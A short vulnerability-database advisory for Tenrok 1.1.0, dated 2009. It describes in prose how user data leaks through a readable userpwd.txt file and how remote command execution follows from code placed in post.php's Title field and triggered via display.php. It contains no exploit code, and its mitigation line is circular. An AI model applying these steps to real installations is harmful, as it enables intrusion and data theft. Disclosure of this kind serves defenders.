Vendor: Tenrok
By: SirGod
CVSS: 8.8 (HIGH)
Users Data Disclosure and Remote Command Execution
CWE: 200, 78
Product Name: Tenrok
Affected Version From: 1.1.0
Affected Version To: 1.1.0
Patch Exists: NO
Related CWE: N/A
CPE: tenrok
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities
Tenrok 1.1.0 is vulnerable to user data disclosure and remote command execution. An attacker can access the userpwd.txt file to view user data, and can execute remote commands by writing malicious code in the Title field of post.php and then accessing the display.php page with the command as a parameter.
Mitigation:
Ensure that the application is not vulnerable to user data disclosure and remote command execution.